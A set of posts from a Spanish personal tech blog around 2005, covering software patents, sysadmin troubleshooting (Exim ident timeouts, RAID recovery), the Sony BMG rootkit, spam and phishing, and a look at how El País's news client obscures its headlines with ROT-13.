Pero lo curioso del caso es que quizás sirva como importante revulsivo en el mundo de la web. ¿Acabará esta medida del explorer con la publicidad flash?. ¿Y con el horrible uso (y abuso) de menús y webs en flash?. ¿Significará esto un impulso de tecnologías alternativas, como svg, smil y otros para que se puedan integrar directamente otro tipo de formatos de datos en la web, sin recurrir a componentes externos?. Aunque sin lugar a dudas la concesión de esa patente sea extremadamente perudicial para la web, puede servir para impulsar tecnologías alternativas y mejores, como pasó en el caso del formato gráfico GIF con patente de Unisis, que impulsó el lanzamiento del estupendo formato PNG.

Y… ¿Quitarán el flash de la web de la escuela? A ver si hay suerte… ;)

PD: ¡No olvides expresar tu opinión sobre las patentes en el cuestionario abierto por la comisión europea!

¿Quieres incrementar el número de visitas de tu blog? Aquí te dejo con las instrucciones necesarias, gracias a los geniales Userfriendly:

Casi me vuelve loco este problema que me he encontrado en GIO, el departamento donde curro.

Sin aparente explicación, los windows del departamento tardaban 30 segundos en conectar al servidor de correo, mientras que en los linux era instantáneo. Después de mucho configurar, desactivar firewalls, filtros, antivirus, antileches no conseguía nada. Un simple telnet al puerto 25 del servidor tardaba 30 segundos en mostrar el mensaje de vienvenida del servidor de correo, un Exim versión 4.

Además la red de GIO son todo switches, con lo cual no es posible capturar el tráfico de un windows desde mi portátil con linux directamente. Al final a buscar un hub por todos lados para poder capturar el tráfico.

Nada más ver la captura en Ethereal, se entiende todo:

La superior es el linux, y la inferior en windows. En naranja están marcados los tiempos de recepción de paquetes del windows, donde se aprecia cómo transcurren 30 segundos desde el primer SYN y recibir la respuesta SMTP.

La única diferencia entre ambas trazas son las peticiones “auth” (El protocolo ident, RFC 1423). El servidor SMTP trata de obtener información del ident del host que se conecta. En linux la conexión es rechazada, y la conexión sigue. El windows no responde, y se reintenta varias veces hasta que da timeout.

Haciendo un grep de auth, ident, etc… en los ficheros de configuración del Exim no encontraba nada. Finalmente busqué “timeout” y encontré finalmente las líneas culpables del desaguisado:

rfc1413_hosts = *
rfc1413_query_timeout = 30s

Reduciendo el timeout a 1 segundo el problema se solucionó :). Espero que os pueda servir de ayuda si le ocurre lo mismo a alguien, y recordar, para solucionar problemas de red, un analizador de tráfico como Ethereal te puede ayudar y mucho.

Como comenta hoy Chema, la SGAE (ladrones) amenaza con denunciar a las webs donde se insulte a sus directivos. Teniendo en cuenta que “Linux” es una palabrota en sus foros, no sé que pensar…

Paralelamente Bruselas expedienta a la SGAE, nuestra querida y nada mafiosa organización, y otras sociedades de autores y compositores europeas, por prácticas restrictivas en la venta de licencias para descargar música en Internet. La Comisión Europea ha afirmado que las sociedades de gestión de derechos crean monopolios nacionales, como recoge Barrapunto:

Según la CE, los contratos de estas sociedades son demasiado restrictivos, ya que obligan a los compositores a transferir sus derechos en exclusividad a las sociedades de gestión nacionales. De este modo, éstas se garantizan el monopolio en el país en que actúan, pues logran manejar el mercado a su antojo. […] La Comisión Europea (CE) ha decidido abrir procedimientos formales contra la Confederación Internacional de Sociedades de Autores y Compositores (CISAC) y contra estas sociedades de forma individual

Con todo esto, que vengan y me digan quién es el mafioso y el que actúa de forma realmente perniciosa.

Fon, el proyecto para crear una red de acceso inalámbrico a Internet aprovechando las conexiones de los usuarios, un proyecto del que ya he hablado en otras ocasiones, parece que va a despegar por fin con toda la fuerza que le dan 18 millones de dólares proporcionados por importantes empresas de Internet como Google y Skype entre otras.

El anuncio ha inundado la prensa, tanto escrita como importantes medios de comunicación en la web.

El principal problema con que se enfrentaba, las restrictivas cláusulas que las operadoras imponen a los usuarios, que les impiden dar acceso a terceros, parece que se solventarán con acuerdos entre Fon y las operadoras, que tendrán su compensación.

A las que menos les gusta todo esto parece que serán las operadoras de móviles, que ven cómo sus redes 3G, que tanto les han costado lanzar, se pueden quedar muy pronto sin usuarios.

Hace dos años Bill Gates, en un subidón de autoestima, prometió acabar con el spam en un plazo que acababa hoy.

Evidentemente no ha sido así. Hoy mismo he recibido 213 correos basura en mi cuenta de Eurielec y 355 en la de Gio, mi curro. La gran mayoría, todos excepto 3 o 4, son filtrados y clasificados adecuadamente por mis filtros antispam.

Como cuenta Slashdot, Microsoft lo ve de manera diferente, según ellos se referían a “solucionar” el problema parcialmente hasta que su impacto sobre los usuarios sea “menor":

To “solve” the problem for consumers in the short run doesn’t require eliminating spam entirely, said Ryan Hamlin, the general manager who oversees the company’s anti-spam programs. Rather, he said, the idea is to contain it to the point that its impact on in-boxes is minor. In that way, Hamlin said, Gates’ prediction has come true for people using the right tactics and advanced filtering technology.

En efecto la mayoría de los usuarios dispone ya de filtros anti-spam más o menos decentes. De todas formas hay que recordarles que yo, por ejemplo, tengo el mismo sistema antispam desde hace dos años, y que los avances, si es que ha habido alguno, no han sido gracias a MS. Gmail, a pesar de llegar muy muy tarde al mercado de los webmail ha conseguido en poco tiempo un filtrado infinitamente más efectivo que el de Hotmail de Microsoft, y los productos anti-spam son junto con los antivirus un añadido imprescindible para cualquier windows.

Su gran apuesta, el sistema semi-propietario de claves para autenticar la fuente del correo ha sido un gran fracaso, y su amenaza de cerrar Hotmail a todos los correos que no cumplieran su estándar se ha quedado en agua de borrajas.

En fin, es una nueva demostración de que Microsoft hace mucho tiempo que se ha convertido en una empresa-mamotreto con pocas capacidades de reacción y de innovación. Google gana en buscadores, se marcó un importante tanto mediático negándose a suministrar datos de búsquedas al gobierno americano, y Microsoft mientras debe pedir moratorias a la UE para cumplir las condiciones anti-monopolio. Cada vez parece más claro que Google superará a MS en cuanto a importancia en nuestra vida diaria. Esperemos que no sea un monopolio tan perjudicial como lo ha sido MS.

De nuevo la Comisión Europea vuelve a impulsar la patente comunitaria. Tendremos que estar atentos de si tratan de incluir las patentes de software entre los “inventos” susceptibles de ser patentados. Groklaw analiza el comunicado de la Comisión.

Esta vez al menos parece que buscan opiniones externas, y han abierto una consulta pública hasta el 31 de Marzo. ¿La pega? que la consulta va orientada a saber la “mejor forma de implementar las patentes", no si las quieres o no, a pesar de que las patentes de software han sido ya rechazadas en multitud de ocasiones. De todas formas hay algún apartado en el que expresar la opinión en contra de las patentes de software. A ver si FFII, NoSoftwarePatents y otros analizan pronto la consulta y dan indicaciones de cómo expresar mejor la postura contra las perniciosas patentes de software.

En otro orden de cosas, ya ha salido el borrador de la GPL versión 3, con numerosos cambios que buscan proteger a los usuarios contra las tecnologías DRM, trata el uso de software GPL en servicios online, que los que contribuyen código GPL esten automáticamente cediendo las patentes que contenga y define los mecanismos para que los propietarios del copyright puedan añadir nuevos términos de licencia (haciendo más flexible la GPL). De nuevo Groklaw analiza en profundidad el borrador, comparando los principales cambios con la versión anterior.

Aún me dan vaídos cuando recuerdo la celebración de HispaLinux de 2001 que organizamos en la Escuela los de Eurielec. Dormí menos de 2 horas al día y aún me faltaba tiempo para todos los preparativos.

Este año el Congreso de Hispalinux 2005 parece que la cosa se profesionaliza al máximo, nada menos que el Centro de Convenciones Mapfre de Madrid, en pleno Azca.

También se realizan menos conferencias, sólo una a la vez, más un taller y demostraciones que sí que podrán coincidir. Las conferencias que no tengan hueco se grabarán y pondrán a disposición del público por Internet. Aun así se me antoja un poco comercial, con un programa un tanto sosillo en mi opinión. He visto cosas más interesantes en el KasLab

Los siguientes ejemplos son documentos de texto. Adivine cuál de ellos es el ideado por MS, en aras de la compatibilidad y los estándares, y cuál OpenDocument, el estándar de aplicaciones libres como OpenOffice.

…vs…

La respuesta (para quien no lo tenga clarísimo) la puede encontrar en la interesantísima comparación de formatos realizada por Groklaw.

No lo entienden, no hay manera. El mundo cambia, evoluciona y algunas cosas tienen que cambiar inevitablemente.

Igual que los aguadores perdieron su negocio, los distribuidores de contenidos, aún siendo todo lo poderosos que son, lo acabarán perdiendo. La red es el mejor medio de distribuición, y, o saben adaptarse, o Internet se encargará de que sólo queden productores y consumidores de contenidos.

Hasta entonces presenciaremos toda clase de pataletas, protestas y manipulaciones. En España se pretende cambiar la LPI para limitar la copia privada y restringir los derechos de los usuarios (ni que fuera a cambiar algo), Sony mete la pata a lo grande con sus tecnologías anti-copia (ni siquiera impedía la copia, y se ha ganado hasta denuncias), limitan la búsqueda de ciertos términos en Kazaa (se usarán otras redes), en Europa las discográficas quieren usar los registros de llamadas e Internet propuestos para la lucha anti-terrorista para luchar contra la piratería (y nuestros derechos dando vueltas por el tetrete).

Las operadoras de telefonía están espabilando más rápido, según parece. La revolución de la telefónía móvil ya les dió el primer aviso, y parecen mucho mejor preparadas para el cambio a la “Sociedad en Internet". Algunas cosas les siguen doliendo, pero evolucionan.

La mayoría de las empresas de telefonía han invertido como locos en fibra, (para estar en el mercado de las redes), y centran sus ofertas a los usuarios en ofrecer Internet y tele, siendo el teléfono casi un añadido, con muchas llamadas gratis. Además han comprado o invertido en empresas de contenidos. Las operadoras de móviles por fin impulsan el 3G y parece que empiezan a encontrar posibles servicios de interés para los usuarios, como vídeos o TV (no más wap, ¡por favor!). Como se decía en las últimas jornadas de Telefónica Móviles que se hicieron en la Escuela (que tuve que cubrir fotográficamente), las operadoras que quieren mantener sus ingresos, tendrán que fomentar más consumo de servicios más baratos.

Igual que hay negocios que se acaban o se transforman, nacen nuevas ideas, como fon, impulsada por el ex-fundador de Jazztel, que pretende crear una red wifi que cubra toda españa con la participación de los usuarios y la comunidad. Interesante…

Voldemort… :P

Toma spoiler, jejeje… Ayer fuí al preestreno de la última de Harry Potter, gracias a unas invitaciones que vagaban sin dueño. No está mal la peli, buenos efectos especiales, pero no me pareció “la película". Mi hermano corroboró mi opinión destacando durante el viaje de regreso a casa todos y cada uno de los detalles que se habían olvidado… jejeje, se sabe el libro de memoria. :)

En cuanto al preestreno, un horror. Colas, empujones, gente babeante ante una cámara (¿por qué la gran aspiración de la gente en la vida es salir en la tele?), mucho pijo, mucha espera, etc. Al parecer había famosos (que ni me sonaban) y la gente suspiraba por un autógrafo y una foto. Puag.

En fin que la peli no está mal, pero los estrenos son un agobio.

Update: Según el test que comenta Chema soy:

Chema comenta en su blog sobre el DRM de Sony que instalaba un rootkit en las máquinas windows para enviar información de copias y hasta se han publicado unos mapas de la infección (Asia | Europa | EEUU) analizando qué servidores dns conocen el dominio que usa el rootkit (lo cual implica una máquina en la red infectada).

Pero es que aún hay más:

• Hace más cosas aparte de sonar como CD de música
• Han aparecido virus y troyanos derivados del DRM
• Su EULA es casi peor (EEF), y dice cosas como:
  1. If your house gets burgled, you have to delete all your music from your laptop when you get home. That’s because the EULA says that your rights to any copies terminate as soon as you no longer possess the original CD.
  2. You can’t keep your music on any computers at work. The EULA only gives you the right to put copies on a “personal home computer system owned by you.”
  3. If you move out of the country, you have to delete all your music. The EULA specifically forbids “export” outside the country where you reside.
  4. You must install any and all updates, or else lose the music on your computer. The EULA immediately terminates if you fail to install any update. No more holding out on those hobble-ware downgrades masquerading as updates.
  5. Sony-BMG can install and use backdoors in the copy protection software or media player to “enforce their rights” against you, at any time, without notice. And Sony-BMG disclaims any liability if this “self help” crashes your computer, exposes you to security risks, or any other harm.
  6. The EULA says Sony-BMG will never be liable to you for more than $5.00. That’s right, no matter what happens, you can’t even get back what you paid for the CD.
  7. If you file for bankruptcy, you have to delete all the music on your computer. Seriously.
  8. You have no right to transfer the music on your computer, even along with the original CD.
  9. Forget about using the music as a soundtrack for your latest family photo slideshow, or mash-ups, or sampling. The EULA forbids changing, altering, or make derivative works from the music on your computer.
• Parece que puede contener código LGPL, y no publica las fuentes, por lo que el rootkit viola la GPL.
• Le ha supuesto a Sony varias demandas

Afortunadamente parece que da marcha atrás, y ya está proporcionando herramientas para desinstalar el rootkit (con muchos bugs, pero bueno), lo ha dejado de incluir en nuevos CDs y parece que hasta retirará del mercado los que lleven el mencionado mecanismo anticopia.

Hoy he visto el lanzamiento de ¡Extra!, un cliente de noticias de el periódico El País, que se baja los titulares y permite ver noticias de una forma muy cómoda.

No me he podido resistir a indagar un poco en las tecnologías que usaba por debajo. ¿Usarán por fin RSS? ¿Algo estándar? ¿Algo que se pueda usar con otros lectores de feeds RSS?

Lo instalé en el ordenador de mi hermano (el único con windoze) y me puse a capturar el tráfico: Resultado: algo decepcionante. No usa nada estándar.

Lo primero que hace es la petición de /pam/config.html (no hace ninguna comprobación de user-agent ni nada), que devuelve un fichero comprimido con gzip, aunque con errores al final. ¿Un burdo intento de que los descompresores den error? ¿un crc? zless, zcat, etc permiten ver el fichero sin problemas a pesar de todo:

$ wget www.elpais.es/pam/config.html
–00:58:47– http://www.elpais.es/pam/config.html
=> `config.html’
Resolving www.elpais.es… 195.53.49.7, 195.53.49.18
Connecting to www.elpais.es|195.53.49.7|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1,737 (1.7K) [application/octet-stream]
100%[=====================================================>] 1,737 –.–K/s
00:58:47 (123.55 KB/s) - `config.html’ saved [1737/1737]
$ file config.html
config.html: gzip compressed data, from Unix
$ mv config.html test.gz
$ gunzip test.gz
gunzip: test.gz: unexpected end of file
$ ls -la test
ls: test: No such file or directory
$ zcat test.gz > test
zcat: test.gz: unexpected end of file
$ ls -la test
-rw-r–r– 1 user user 8418 2005-11-11 01:00 test

El fichero descomprimido resulta ser este XML, que parece ser un fichero de configuración de la aplicación, definiendo tipos de letra, secciones, etc. Pero ahí no está lo interesante, los titulares… sigamos mirando…

A continuación se baja un montón de imágenes variadas para la interfaz y publicidad, y lo interesante: /pam/news.html. En este caso es un fichero HTML sin más (peaso tecnología) que tiene cosas como:

<td>20051111elpepunac_1.Tes</td>
<td>Gerf snyyrpvqbf ny qreehzonefr ha rqvsvpvb ra Gneentban cbe han rkcybfvuffffa qr tnf</td>

El documento completo lo podéis ver aquí. ¡Parece algún tipo de encriptación avanzada de alto nivel! XDDD

Por los enlaces del documento se puede deducir mirando en la noticia original que:
Gerf snyyrpvqbf ny qreehzonefr ha rqvsvpvb ra Gneentban cbe han rkcybfvóa qr tnf
Debe ser equivalente al titular:
Tres fallecidos al derrumbarse un edificio en Tarragona por una explosión de gas

¡¡¡Oooohhh… que chungooooo!!! un desplazamiento de 13 caracteres, ROT-13… realmente currado, si señor, creo que nadie lo habría sacado (yo sólo gracias al super ordenador que me ha prestado la NASA).

$ echo "Gerf snyyrpvqbf ny qreehzonefr ha rqvsvpvb ra Gneentban cbe han rkcybfvóa qr tnf"
| tr n-za-mN-ZA-M a-mn-zA-MN-Z
Tres fallecidos al derrumbarse un edificio en Tarragona por una explosión de gas

Finalmente cuando das a visualizar una noticia, solicita: /pam/articulo-pam.html?xref=<id1>&anchor=<id2>, donde <id1> e <id2> son la primera y segunda parte del código de noticia que aparece en el listado. Es decir, para “20051111elpepunac_1.Tes” se separa por el punto, y ya está.

Molaría tener un conversor de Extra a RSS normal y corriente, que nos sería muy útil a los linuxeros. Y a ver si las empresas de comunicaciones aprenden que lo mejor es adoptar estándares, que simplifican las cosas. Ellos deberían querer informar, ¿no? pues eso, que no tiene sentido tratar de ocultar las cosas.

Mientras tanto, para todos vosotros (con código fuente incluído):

Convertirlo a RSS sencillo es trivial. Lo que molaría sería hacer que se bajara el contenido de las noticias para incluirlo en el feed. ¿Alguien se anima?

Ahora SCO se luce pidiendo todos los documentos de IBM relacionados con sus contribuciones al kernel 2.7.

¿2.7? ¡No existe! XDDD, y de hecho parece que va a pasar tiempo hasta que se abra una nueva rama, ya que de momento están añadiendo características a la versión 2.6 para evitar que las mejoras y cambios tarden tanto en llegar a la comunidad como con la transición 2.4 -> 2.6.

Groklaw recoge y explica la noticia con gran humor:

The supremely funny SCO Group has now topped even itself. They have asked IBM to turn over “all documents concerning IBM’s contributions to the Linux 2.7 kernel,” including “development work.”

There is no Linux 2.7 kernel.

Please, please, please, let SCO ask the court to sanction IBM for refusing to hand over the 2.7 materials. Pretty please?
[…]
Here’s the part the court won’t find funny. As IBM pointed out at the hearing on October 7, the discovery protocol Judge Brooke Wells set forth is supposed to go like this:

• SCO tells IBM what code they believe they have rights to in Linux and how IBM misused it;
• IBM provides discovery regarding that allegedly infringed code.

Here we have SCO asking for materials regarding a nonexistent Linux kernel. On what basis are they making the request? On the basis that they have some information that IBM has infringed their code? Do tell us, SCO, do, what code in Linux 2.7 you have rights to and precisely how IBM has infringed it, won’t you, please? We are all ears. You’ll have to speak up, though, because we are laughing so hard, we won’t be able to hear you if you mumble.
[…]

Noticia completa en Groklaw

Pobres, les queda tan, tan poquito para echar el cierre a su empresa…

Nuestro flamante nuevo planeta, encargado directamente a Magrathea con todos los extras, pero sin embargo se le nota aún algo cojo.

Propongo convocar un concurso público de creación de logotipos para Planeta Teleco. ¿Que os parece? El Premio, por ejemplo, podría ser una magnífica palmadita en la espalda (si no la tiene muy grande). :P

El Hubble ha fotografiado una tormenta de polvo de 1500 kilómetros de longitud. Afortunadamente no producirá daños como el Katrina, Alfa, Beta, y los que nos quedan, porque ocurre un poco lejos, en Marte (aunque muy cerca en estos días).

Impresionante, ¿no?

El miércoles cascó el servidor de la asociación de estudiantes Eurielec, y no es la primera y la segunda vez que le pasa. El hardware siempre acaba fallando, y aún más si está en una universidad con cortes, picos y problemas de alimentación continuamente.

Eso significa que te quedas sin correo, sin web, sin blog, sin los ficheros de la cuenta, etc. Así que había que arreglarlo.

Al reiniciar: problemas. Los dispositivos raid strip no se inician y los mirror lo hacen de forma inconsistente (con un solo disco en vez de dos). Pasamos a ejecutar leeeentos “reisferfsck –rebuild-tree” en las particiones petadas, y parece que todo se va arreglando, pero en una de las particiones el kernel acaba soltando un Oops. Jurl…

El jueves arranco con una gentoo en CD, que tiene todas las herramientas inimaginables para arreglar un sistema. Una distribución realmente recomendable para este tipo de problemas y reparaciones. Logro acabar de pasar el reiserfsck y al intentar recomponer los raid me doy cuenta de que las particiones de uno de los discos duros no existen… uf, la tabla de particiones fastidiada. Afortunadamente son discos idénticos y con la misma tabla de particiones, así que copio la de uno en otro con la ayuda del excelente sfdisk.

Nuevo reinicio, que sólo sirve para helar aún más la sangre, ya que la partición /home, con todas las cuentas, apenas tiene 256 megas de los 40 gigas que debería tener y sólo quedan una decena de directorios de usuarios. Glups! Advierto que el dispositivo raid está únicamente con un disco. Pruebo a montar la misma partición del otro disco, a ver si se encuentra en buen estado, y ¡hay suerte! Todos los ficheros en su sitio. La copia de los 40 gigas de ficheros de una partición a otra llevó hasta la tarde.

Ya desde casa, traté de recuperar otra partición importante, el /var, que contiene la web, las bases de datos, etc. Increíblemente habían petado muchos ficheros frm de mysql, realmente extraño pues sólo se escriben durante la creación de la tabla, y no se tocan después, pero el rebuild-tree debió hacer de las suyas. Aunque parecía que todo estaba perdido encontré un backup medio-reciente en otra máquina, pero que tenía los frm de las tablas petadas (y parece que actualizados!).

Ya vuelve a funcionar todo, y tengo blog, como se puede ver.

Hoy, en el día de Internet (increíble que se le dé más bombo a este día que al de las bibliotecas, el libro, el hambre…), voy a aprovechar para cagarme en MS y su implementación de los “estándares", que cuando se pone con ello se convierten en, pues eso, “estándares” entre comillas.

En el GIO he perdido 2 horas completas intentando averiguar por qué narices le fallaba una cuenta de correo a un usuario. Timeouts extraños, dejando además después un proceso bloqueado en el servidor hasta que daba timeout. Naturalmente como el cliente era un windoze, lo primero que he hecho ha sido probar en mi portátil, con telnet al puerto 110 si podía descargar bien los mensajes. Sí podía… Bien… Qué sorpresa… De verdad que no me lo esperaba… jejeje.

Una de las primeras cosas que probé fue desactivar el proxy-firewall-antivirus mierdero, que se dedica a interceptar conexiones TCP para ver si lo que pasa tiene virus, y siempre ha dado muchos problemas. Nada.

La configuración de usuario, tiene puesta la IP externa del servidor, que va por ADSL, y se arrastra. Eso puede ser la razón del timeout. Lo cambia… y nada…

Al final a las malas me voy a por mi portátil a interceptar el tráfico con el Ethereal, a ver qué narices está enviando el puto Outlook. Tras varias capturas infructuosas (por qué no pillará nada?) me doy cuenta que había pillado un switch para enchufar los dos ordenadores, que como era muy cutre había tomado por hub. Una vez conectado de nuevo todo al hub logro capturar. ¿Resultado? Seguía enviando a la IP antigua… “Hay, es que no he dado a Finalizar"… putos asistentes de windoze. Se cambia la IP de nuevo y ahora como la seda… ooohhh…

Pero lo flipante es el timeout del Outlook. Si está recibiendo datos de un mensaje, debería seguir recibiendo, aunque tarde mucho. El timeout es para las conexiones que han dejado de recibir datos, ¿no? Pues MS cierra la conexión pasado el minuto de descarga para cada mensaje, y cierra la conexión a lo burro, sin cerrar la conexión, por lo que el servidor no se entera de la desconexión y no puede eliminar los bloqueos.

Grrrr… ¿Cómo sería Internet hoy en día sin MS?

Últimamente se le están escapando más mensajes basura a mis filtros anti-SPAM. Voy a tener que echarle un ojo un día de estos.

Lo peor de todo es que me hacen mucha gracia, como uno vendiendo un pack de software para grabar mensajes subliminales en archivos de audio… XDDD. Me pregunto si se podrá aplicar para los estudios, eso de que te lo pones por la noche y a la mañana siguiente ya te lo sabes todo. jejeje.

Hoy he recibido el intento de phising mas cutre del mundo entero:

• Se equivocan con el nombre del banco: El banco Santandero.
• La traducción es pésima: “sigue el acoplamiento".
• Y encima se les olvida el formulario para robar los datos al usuario…

¿Se puede ser más inutil? Bueno, sí. También lo puedes enviar 5 veces a cada persona (como han hecho) por si a alguien no le queda claro que es un phising.

Aquí la obra de arte:

Por último otro mail basurilla, con las coñas que envían los amigos. Ésta (novedad), me ha hecho gracia:

Qué ojo tenía el chaval, se le nota avispao. Lo mejor de todo es que no se puede decir que la solución sea incorrecta… XDDD.

Parece que por fin en breve podremos tener unos drivers open source para mi wireless, basada en el chipset Broadcom 43xx, sin tener que recurrir a los de windows y un cargador (ndiswrapper) como hasta ahora. Aunque el fabricante no ha dado ni un sólo dato del cacharro, la comunidad ha sido capaz de destriparlo y hacerlo funcionar. Me pregunto que habrá ganado la compañía evitando dar información, aparte de odios de la comunidad Open Source y mucho tiempo perdido.

También interesantísimo el nuevo VMware Player. Permite ejecutar imágenes de sistemas operativos creadas con alguno de sus hermanos mayores y es gratis. A pesar de no ser código libre, es muy interesante para que cualquier windowsero pueda bajarse el player y alguna de las imágenes ya creadas disponibles en internet (todas con sistemas operativos Open Source, que si no serían ilegales). ¡¡¡Así podrán entrar en contacto con el mundo linux con nada de esfuerzo!!!.

Y te daré el modelo de impresora, número de serie, fecha y hora a la que fue impreso.

Ya se sabía que los fabricantes de impresoras a color estaban incorporando mecanismos para incluir, de forma apenas perceptible, información sobre el propietario en las impresiones, de forma que se pueda determinar su origen. La excusa se centra, como siempre, en que se trata de luchar contra la delincuencia (falsificaciones, amenazas).

Como siempre en estos casos los que salen perdiendo son los ciudadanos de a pie, que pierden parte de su privacidad, y encima tienen que asumir el coste de los puntitos amarillos para que el gobierno pueda averiguar la procedencia de los papeles que uno imprime. Por supuesto el coste es marginal, pero me da igual, que me devuelvan mi céntimo de euro.

El caso es que ahora la Electronic Frontier Foundation ha logrado descifrar el código utilizado en las impresoras Xerox (la noticia). Eso significa que aún tienen una excusa menos, a saber, la endeble “Sólo el servicio secreto sabe descifrar el código, y lo utilizará solo para ejercer el bien puro en la tierra y el cie…".

Lo que yo me pregunto es, si los fabricantes aceptan meter este tipo de medidas en dispositivos hardware, más costoso y complicado, que no tendrán ya metido en windozes y worditos… Ya sabes, “Use the Source, Luke!“

“Ubuntu” is an ancient African word, meaning “humanity to others". Ubuntu also means “I am what I am because of who we all are". The Ubuntu Linux distribution brings the spirit of Ubuntu to the software world.

Finalmente, tras mucho tiempo de largo camino, una Ubuntu “Breezy Badger” ha reemplazado a mi vetusta y desactualizada Gentoo. Todo funciona bien, se nota el nuevo gnome mucho más rápido y con menos consumo de memoria, aunque aún me quedan cosas por personalizar, que tenía mi Gentoo muy bien configurada.

Gentoo es una experiencia muy recomendable para todo aquel que quiera aprender un poco de linux. Especialmente el proceso de instalación, “from the scratch". Después de eso no habrá nada que se os resista. Pero para usar en un portátil compilar todo el rato no es una opción, y ahora con tanto curro no puedo perderlo hackeando tanto.

Pelea abierta por el control de los nombres de dominios que ahora ejerce ICANN, bajo auspicio de EEUU. La Unión Europea al parecer advierte de que pretender seguir ejerciendo el control unilateral de este órgano de gobierno de Internet puede provocar una escisión de Internet.

Un poco tremendista el artículo, no creo que nadie pretenda llegar hasta ese punto, pero habrá que ver quién gana esta batalla.

Paralelamente, pero sin dejar el ámbito tecnológico, informo que me cago en OpenLdap y parientes: los sudores que me ha costado tener algo medio funcionando, pero parece que pronto podremos tener cuotas de impresión en Eurielec, con cuentas almacenadas en LDAP, usando Pykota. ¡Moooola!. Si alguien de Euri se aburre podría ir investigando cómo montar las cuentas y correo tirando contra LDAP, que es lo único que falta para tener todo integrado.

7 añitos y parece ya tan mayorcito…

Oficialmente los cumplió el pasado 7 de septiembre, pero ahora han puesto (o he notado por primera vez) el logo conmemorativo… ¿estarán de celebraciones?

Ya hay miles de mofas a la ya mítica frase de Steve Ballmer, que exlotó al conocer la fuga de un importante ingeniero a la competidora Google:

– Ballmer: ‘Just tell me it’s not Google'’
– Lucovosky replied that he was joining Google.
(At that point, Mr. Ballmer picked up a chair and threw it across the room hitting a table in his office)
– Balmer: ‘I’m going to fucking bury that guy, I have done it before, and I will do it again. I’m going to fucking kill Google.’
(Hablando cariñosamente del CEO de Google, Erik Smith, que también ha estado en Sun y Novell)

Pero Userfriendly lo borda:

Hoy es el día del Software Libre, día en el que tenemos que intentar educar e informar de las virtudes y motivos que impulsan el Software Libre.

Y a MS se le ocurre hace sólo dos días enviar un mail a Eric S. Raymond, proponiéndole trabajar para Microsoft… jajaja… Lo cuenta en su blog, la respuesta, por supuesto, en clave de humor y para partirse de risa. Un fragmento para deleite de todos:

[…]

On the day *I* go to work for Microsoft, faint oinking sounds will be
heard from far overhead, the moon will not merely turn blue but
develop polkadots, and hell will freeze over so solid the brimstone
will go superconductive.

But I must thank you for dropping a good joke on my afternoon. On
that hopefully not too far distant day that I piss on Microsoft’s
grave, I sincerely hope none of it will splash on you.

Cordially yours,
Eric S. Raymond

¡Ya está aquí el nuevo y refrescante Gnome 2.12!

Parece que de una vez por todas podremos descansar un poco.

El Parlamento Europeo ha rechazado una vez más las patentes de software (FFII, El País, El Mundo, Slashdot, Reuters, Guardian Online blog, The Register, etc…), por un “ajustado” margen… del 95% de los votos ;). 648 a favor, 18 en contra y 14 abstenciones. Un duro rapapolvo, con críticas incluídas de los eurodiputados, por el papel jugado por la Comisión Europea en el asunto.

Desde hacía mucho la Comisión se había vendido a los intereses de las grandes empresas y lobbies, e ignoraba la voluntad popular, de las pequeñas empresas e incluso las enmiendas del propio Parlamento Europeo, representante electo de todos los europeos.

Ayer decían de forma amenazante que no presentaría nuevas propuestas en caso de que se rechazara “la posición común” (la que únicamente ellos tienen, se entiende), pero despues del tajante rechazo del Parlamento, parece que se volverán a pensar si presentar algo más coherente.

Algunas de las frases más duras han sido dichas por Michel Rocard, impulsor de las 21 importantes enmiendas que modificaban de forma muy importante la propuesta de la Comisión y limitaban de forma tajante en qué casos se podrían conceder las patentes de software.

Pero viendo la gran oposición e indignación en el Parlamento por la propuesta, propuso que la Cámara se pronunciase en contra de la directiva, como ha ocurrido de forma casi unánime: “Sobre el fondo del tema estamos divididos. Pero compartimos una cólera colectiva en el PE sobre la forma inadmisible en que ha sido tratado por la Comisión y el Consejo debido a la ausencia total de consulta a la hora de redactar el texto”. El debate, señalaba, “no está maduro” y “hay que rechazar esta directiva como un mensaje a la Oficina de Patentes”.

Enhorabuena a todos los defensores de la libertad en el mundo de la informática, que tanto han luchado en contra de las patentes: FFII, NoSoftwarePatents, Proinnova en España y muchos otros…

¿Como sería una casa diseñada por desarrolladores de software?

Aquí tratan de dar respuesta a la pregunta, e imaginan la hipotética casa fruto de las mentes perturbadas de los programadores.

Tiene algunas perlas como:

“You press the door bell but don’t hear the reassuring ding dong sound coming from inside the house, you ponder if you missed hearing it and wait a few moments before politely pressing it again, this time you’re SURE, there was NO doorbell sound coming from inside. You peer at the doorbell, it’s a button, how much more complicated can it be? You DOUBLE CLICK it and hear a loud DINGDONG coming from inside.”

PHP cumple 10 añitos. Lo que empezó siendo un pequeño proyecto de Rasmus que proporcionaba algunas herramientas para páginas personales se ha convertido en uno de los lenguajes para desarollo de aplicaciones web más extendido y muy muy potente.

¡Felicidades!

Google está a punto de presentar un nuevo servicio, que nos promete traducciones más precisas, acertadas e inteligentes.

No se trata de reglas complejas, comprensión gramatical, ni nada de eso. Se trata de un motor de traducción que “aprende", como los bebes empiezan a asimilar el lenguaje: atendiendo y escuchando, no mediante el aprendizaje de reglas sintácticas.

Al parecer los laboratorios de Google han creado una serie de herramientas estadísticas, que han analizado los miles y miles de documentos de Naciones Unidas, que siempre son traducidos minuciosamente a múltiples idiomas por los mejores filólogos. De esa base de datos de más de 200.000 millones de palabras el motor de traducción será capaz de deducir las traducciones que le propongamos.

¿No os parece como por arte de magia? Y lo mejor de todo es que nuestro cerebro, mil veces más pequeño que los potentes ordenadores de google hace el mismo análisis y deducción desde que somos enanos para permitirnos aprender el lenguaje. Somos mágicos ;).

Planet Gnome, el portal de los blogs de la comunidad de desarrolladores de Gnome ha cambiado de look. Quitando lo horrible que se ve en Explorer, el estilo está chulo, pero tiene el grave inconveniente de desperdiciar mucho espacio de pantalla sin texto ni contenido. No quiero ni pensar cómo se verá cuando alguno ponga código en una anchura tan reducida.

Así que aquí está mi propuesta para el nuevo diseño, simplemente quitando la insulsa barra de la derecha, y colocándola arriba. Ah… y si ya cambian el color por defecto de los enlaces, que el azulito ese da pena, pues mejor (si no, habrá que tirar de Greasemonkey).

A lo mejor Fer, que si que está sindicado en Planet Gnome puede hacer llegar mi propuesta.

En el blog de Lu encuentro una referencia al teclado más friki del mundo…

Mola, no está mal… ¿la pega? Que no puede ser retroiluminado… XDDD

GTD TiddlyWiki es la aplicación más increíble y útil que he visto programada íntegramente en javascript.

